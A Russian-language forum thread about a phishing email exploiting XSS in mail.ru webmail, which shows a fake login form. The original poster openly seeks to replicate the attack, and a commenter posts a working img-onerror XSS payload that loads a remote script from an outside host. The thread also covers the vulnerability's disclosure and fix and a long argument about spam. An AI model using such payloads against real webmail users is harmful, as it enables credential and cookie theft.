очень интересный фишинг
 

Здравствуйте, уважаемые.

Дело тут такое. Пришло вчера мне на почту письмо, (mail.ru)



с темой документы срочно. Открываю меня сразу перекидывает в папку входящие





Но я думаю глюк какой то. Через 30 секунд всплывает аут форма.



Форма отправляет данные на парсер, который находится на холмах. (hut.ru)


Я попытался сделать такую фичу самостоятельно. Вытащил html из тела письма. Но чет не получается.

Кто бы мне мог помочь в этом деле? Товарищи знатоки.

Спасибо за внимание)

картинки бы посжимать, а то вёрстка поехала ... ну да ладно

меня бы как пользователя, насторожило бы это



красненькой стрелочкой помечено что-то неведомое (ломание вёрстки, xss?)

красненьким овальчиком - это похоже на ajax spinner с facebook, что оно тут делает?

PS наконец то попробовал gimp 2.8

Где изображение там это.



Ведет на js файл с этим содержанием.

http://zalil.ru/33232691

PS. Сюда скопировать не мог, так как превышает 10000 символов

А где красненький кружечек, там ничего особенного когда mail не может загрузить картинку он выдает
такую вот штучку

Мне собственно говоря, какой злоумышленники отправляют код)) Чтобы в страницу mail.ru впечатался так сказать свой java который через 30 секунд после открытия письма выдавал фишинговую форму прям на сайте)

А там, в свою очередь это: http://pastebin.com/YN5TriVm
Оно ещё и куки пытается стащить.

vagabunt, лучше сообщите об этом в техподдержку mail.ru
А ещё лучше — пользуйтесь GMail :-)

Да я хочу сделать так же)) только вот не могу , не знаю что они шлют через свой сендер) какой скрипт)

vagabunt,
а исходник письма можете показать?

Информация отправлена разработчикам Mail.ru
Надеюсь, топикстартер только за ;)

обычная xss ... вот пример покруче

<img src onerror=alert('XSS')>

вместо alert'а можно подставить, что хочешь.

и кстати, скрипт можно было вставить короче :

<img src onerror=(a=document).body.appendChild(a.createElement('scr'+'ipt')).src='http://pastie.org/pastes/3909315/text';a.b;>

только вот вопрос.. как оно на mail.ru прошло?

Вот топикстартер не фига не за:)

Топикустартеру интересно)) какой скрипт отсылают через сендер)

Я понимаю, конечно, добрые дела и всё такое. Но зачем помогать зажравшемуся треш-холдингу с глючными сервисами, украшенному рекламой, как новогодняя ёлка гирляндами? У них даже элементарного уважения к пользователю нету. Возьмите хотя-бы банальную регистрацию мыла: зарегистрируйтесь, не выкладывайте нигде свой адрес, потом, через некоторое время оцените, сколько спама пришло.

Дайте емайл, на который приходит спам сразу после регистрации.

Он не приходит сразу, он приходит постоянно. Емейл не дам, не помню. Давно это было и не только у меня.

Значит смотрите, реклама, из последнего.

— После приобретения Одноклассников Mail.Ru отменена платная регистрация.
— На почте Убрали стартовую страницу с приличным числом баннеров.
— Убрали рекламу в ICQ, после прибретения.
— На главной странице после редизайна тоже убрали один баннер из трех.

Про спам. У нас очень хороший антиспам, я говорю сам как очень активный пользователь плюс мой емайл уж точно светится в интернете во многих местах.

У нас есть персональный антиспам, у нас у еиднственных есть сервис postmaster.mail.ru

И самое главное ошибки могут быть, но вариантов два: спам всетаки приходит и надо фиксить проблему, либо это ложь. Как вы понимаете в обоих случаях надо реагировать.

Затем, что страдают простые пользователи.

На тестовых серверах уже уязвимости нет, надеюсь завтра успеем починить всех.

Ребятааа)))) давайте подумаем какой скрипт шлют взломщики чтобы он сработал в теле письма

Я не буду подсказывать.

Аргумент. Но я бы, скорее, пропагандировал гмыло или яндекс, чем помогал развитию компании, вызывающей только негативные эмоции.

Эмоции это нормально, на то мы и люди и с этим не поспоришь.
Я против неподтвержденных фактов.

А это не ответ?

vagabunt,
Тебе надо - ты и думай.
Те кто считает это аморальным - не будут тебе помогать.
Те, у кого более лояльная мораль к данному действию - не будут помогать тебе бесплатно.
Ответ на твой вопрос(для актуальных уязвимостей) - стоит тысячи долларов на черном рынке, надо полагать.
Не думаю, что кто-то стал бы публиковать такие вещи на публичном форуме по просьбе первого встречного

нет .. Это если даже просто в ХТМЛ сохранить и открыть ничего не происходит, а там когда письмо открываешь тебя редериктит обратно в папку входящие и через 30 сек всплывает форма фишинговая логина и пароля

Дык я готов заплатить)) не 1000 долларов)) стоят) а активка стоит 200 баксов.
Но дело в том что у меня есть пример на почте просто надо вытащить оттуда скрипт, у меня не получается

Каких фактов? Тех, что мейл ру был год назад самым трешовым сервисом из тех, что можно себе вообразить? Сейчас, если они и исправляются, мне даже заходить туда тошно.

Да что там исправляются? Не отрезать лишние атрибуты у тега img — ну это верх несостоятельности разработчиков и тимлидеров, которые обязаны следить за такими вещами. И это в 2012 году, когда целые поколения выросли, имея доступ к интернету, и это когда майл.ру существует уже много лет. Это вам не тестовая версия нового веб сервиса, это сервис, которым уже пользуется много человек, много лет.

Согласен, mail.ru это разводчик спама.. Я им одно время попользовался, и был сильно разочарован тем что из 100 писем 2 актуальных, остальное спам... Знаете но с таким почтавиком далеко не уедешь.

Да и по сей день спама там валом, у меня есть почта на нем и сейчас, но я ее обычно использую для регистрации на разных сервисах/форумах.. А когда захожу подтвердить очередную регистрацию, вижу сотню писем в папке входящие которые ну никак не имеют ко мне никакого отношения.

Если все так просто, то пришлите мне письмо, в котором есть такой аттрибут.

И не надо думать что все кроме Mail.Ru боги

https://www.google.ru/#hl=en&gs_nf=1...w=1440&bih=779

Именно это и может повлечь за собой поток нежелательных писем. Если есть жалобы на спам, приведите факты. Если это действительно спам то мы улучшим антиспам фильтры если нет, то какова цель таких утверждений?

Еще раз повторю, мой емайл легко находится поисковимком, котрый, я уверен очень популярен на этом форуме, да и не только на этом.

https://www.google.ru/#hl=en&safe=of...w=1440&bih=779

В моем ящике спамфильтр работает отлично.

то-есть вы мне прикажите нигде не регистрироваться? Уж поверьте мою почту на гугле знают многие и она по крайней мере в отличии от майловской почты публична, я разработчик и моя почта гуляет по инету, но спама что-то я не вижу у гугла, он есть конечно-же но там где ей положено быть, в папке спама.
А зачем? ради кого или чего? Я пользуюсь тем что мне по душе, зачем мне еще тратить время на то что бы отправлять вам жалобы письма со спамом и т.д. Это ваша работа вы и мучайтесь с ней, не помню что бы гугл просил заниматься тем что вы просите. И цели тут нет, это всего лишь опыт использования вашего сервиса, причем негативный опыт.
И что? Мой емайл тоже легко находится, тока к чему это? мол типо о вашей почте все знают и не спамят? Я рад за вас, но я не планирую использовать mail.ru для работы какой бы вы там антиспам не воткнули.

Еще раз. Вы утверждате Mail.Ru не фильтрует спам. Это утверждение, его надо либо подтвердить фактами либо не делать утверждений которые не можете подтвердить.

Решил чисто из интереса проверить свой ящик. Пароль был успешно забыт, пришлось пройти восстановление. Не буду обращать внимания на то, что после первой попытки ввода пароля появилась капча (нормальные сервисы её показывают со второго или третьего раза), но понравилось следующее.

Ввел я новый пароль, выскочил алерт (не модальное окно с дизайном, а обычный алерт, который используют для тестирования, исключая бюджетные проекты, у владельцев которых просто нет денег на модальные окошки), сообщающий о том, что пароль не может состоять только из цифр. Где надпись, предупреждающая об этом? Может быть я сидел, придумывал сложный пароль, а тут на тебе. Затем, я ввел цифробуквенный пароль. К моему удивлению, выскачил еще один алерт, сообщающий (вы не поверите) «некорректный пароль». Очень исчерпывающе, спасибо.

Только подумав секунд десять, я понял, что парсер не хочет принимать кирилицу. Что за бред? Вы можете сказать, что это мелочи, но на мелочах и держится любой, уважающий себя сервис. (Если в кафе мне вовремя не меняют пепельницу, я туда больше не приду. А зачем, если официантам наплевать на свои обязанности и если по близости есть другое кафе?)

И это всего несколько минут, которые я уделил мейл.ру. Уверен, что посидев немного дольше, я бы нашел еще более глупые недоработки.

А спама во входящих действительно не было (точнее, папка с входящими была пуста), я даже на какой-то момент удивился, сдержав фразу «пацаны — ваще ребята». Но затем я вспомнил, что все письма, которые идут на мой ящик, перенаправляются на гмыло. Открыв папку со спамом, я убедился, что преждевременное удивление было напрасным.


(см. письма с желтой меткой)
Да, вполне возможно, что некоторые письма пришли из-за того, что я на них подписался. Но часть, безусловно, — обычный спам, который с легкостью прошел мейлрушечный фильтр, но не справился с фильтром гмыла.

Про окна спорить не буду. Это вроде редких мест, куда мы не упели добраться, но факт на восстановлении пароля они такие.

Про спам спасибо, поанализируем. Я так понимаю сейчас в среднем одно письмо в день получается?

Не знаю, уже удалил всё.Да, отмазка хороша.

Вопрос, перенаправление настроено через фильтры или именно как перенаправление?

Я это не отмазка, я же признал что плохо.

Не хрена се вы тут палемику развели)))))

Зато с пользой, один баг уже выявили, может сейчас еще выцепим. Очень полезно. Самый лучший фидбек именно от технарей.

Обычное перенаправление.

В случае перенаправления мы работаем как прокси. Я понимаю что попросить попользоваться ящиком шансов нет, но всеравно спасибо.

Кстати, XSS должен пропасть, забыл написать.

AndrewSumin, а у вас новости те что на главной там табы и по штук 8 в каждом, спорт, политика и тд. Они вообще модерируються?

Иногда такая туфта, как такое проходит на главную? Туфта в смысле заголовок мало соответствует содержимому, т.е. по сути это не статья вообще. Неужели такая большая компания не может перечитать в день все новости на главной. Там всего то 56 в день 1 человеку на 3 часа работы + кофе попить.

Туфта прямо сейчас?

Мы 2 месяца назад ужесточили условия можерации.